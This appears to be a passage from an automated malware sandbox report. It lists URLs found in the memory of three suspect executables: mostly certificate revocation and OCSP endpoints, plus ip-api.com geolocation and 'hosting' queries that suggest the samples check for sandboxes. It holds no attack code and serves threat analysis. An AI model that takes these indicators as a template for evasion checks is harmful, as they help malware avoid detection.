00000000.00000003.2012646832.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2041241914.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2054074407.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2038837870.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039565575.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039389379.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039194713.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2053916994.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039013666.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2044886492.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2052154165.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2041851174.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2054109370.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: iqA8j9yGcd.exe, 00000000.00000003.2012872351.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014633379.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013198625.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014721860.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012804022.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014633379.000001609C9CD000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013773729.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012542569.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014222707.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012646832.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2041241914.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2054074407.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2038837870.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039565575.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039389379.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039194713.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2053916994.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039013666.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2044886492.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2052154165.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2041851174.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: based.exe, 00000007.00000002.2819290568.0000020693460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAAC
Source: based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: based.exe, 00000007.00000002.2819290568.0000020693460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACrvic
Source: based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: iqA8j9yGcd.exe, 00000000.00000003.2012872351.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014633379.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013198625.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014721860.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012804022.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014633379.000001609C9CD000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013773729.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012542569.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014222707.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012646832.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2041241914.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2054074407.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2041241914.00000246D4012000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2038837870.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039565575.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039389379.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039194713.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2053916994.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039013666.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2044886492.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2052154165.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: iqA8j9yGcd.exe, 00000000.00000003.2012872351.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014633379.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013198625.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014721860.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012804022.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013773729.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012542569.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014222707.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012646832.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2041241914.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2054074407.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2041241914.00000246D4012000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2038837870.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039565575.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039389379.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039194713.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2053916994.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039013666.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2044886492.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2052154165.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2041851174.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: iqA8j9yGcd.exe, 00000000.00000003.2012872351.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014633379.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013198625.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014721860.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012804022.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013773729.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012542569.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014222707.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012646832.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2041241914.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2054074407.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2038837870.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039565575.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039389379.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039194713.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2053916994.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039013666.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2044886492.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2052154165.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2041851174.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2054109370.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: based.exe, 00000007.00000003.2053889184.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: iqA8j9yGcd.exe, 00000000.00000003.2012872351.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014633379.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013198625.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014721860.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012804022.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013773729.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012542569.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014222707.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012646832.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2041241914.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2054074407.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2041241914.00000246D4012000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2038837870.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039565575.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039389379.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039194713.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2053916994.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039013666.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2044886492.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2052154165.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2041851174.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: based.exe, 00000008.00000003.2076229751.000001F16CF2F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2060409720.000001F16CF57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: based.exe, 00000008.00000002.2799454783.000001F16CEE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: based.exe, 00000008.00000003.2115976918.000001F16D58F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123172020.000001F16D58F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2801268100.000001F16D58C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: based.exe, 00000008.00000003.2152605175.000001F16D0D5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115149912.000001F16D299000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799664583.000001F16D0C6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2264289292.000001F16D0C6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2777793095.000001F16D0C6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799920667.000001F16D299000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2796193966.000001F16D0C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: based.exe, 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: based.exe, 00000008.00000003.2077928263.000001F16D066000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2077472570.000001F16D047000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545r
Source: based.exe, 00000008.00000002.2799365903.000001F16CDE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: hacn.exe, 00000006.00000003.2039194713.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2053916994.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039013666.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2044886492.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2052154165.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2041851174.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2054109370.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2041039077.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2041196362.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2039683442.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2048297770.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2051504122.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2042701533.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2050911110.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2039532651.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2041446276.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2040234951.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2042248095.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2053773599.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2053889184.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: iqA8j9yGcd.exe, 00000000.00000003.2012872351.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014633379.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013198625.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014721860.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012804022.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014633379.000001609C9CD000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013773729.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012542569.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014222707.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012646832.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2041241914.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2054074407.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2038837870.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039565575.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039389379.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039194713.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2053916994.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039013666.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2044886492.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2052154165.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2041851174.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: iqA8j9yGcd.exe, 00000000.00000003.2012872351.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014633379.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013198625.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014721860.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012804022.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014633379.000001609C9CD000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013773729.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012542569.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014222707.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012646832.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2041241914.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2054074407.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2041241914.00000246D4012000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2038837870.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039565575.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039389379.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039194713.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2053916994.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039013666.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2044886492.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2052154165.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: iqA8j9yGcd.exe, 00000000.00000003.2012872351.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014633379.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013198625.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014721860.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012804022.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013773729.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012542569.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014222707.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012646832.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2041241914.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2054074407.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2038837870.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039565575.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039389379.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039194713.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2053916994.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039013666.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2044886492.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2052154165.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2041851174.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2054109370.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: based.exe, 00000008.00000002.2801877653.000001F16D7E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: based.exe, 00000008.00000003.2081488449.000001F16D296000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2079441469.000001F16D280000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2084832069.000001F16D295000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
Source: iqA8j9yGcd.exe, 00000000.00000003.2012872351.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014633379.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013198625.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014721860.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012804022.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2013773729.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012542569.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2014222707.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000000.00000003.2012646832.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2041241914.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2054074407.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2041241914.00000246D4012000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2038837870.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039565575.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039389379.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039194713.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2053916994.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039013666.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2044886492.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2052154165.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2041851174.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
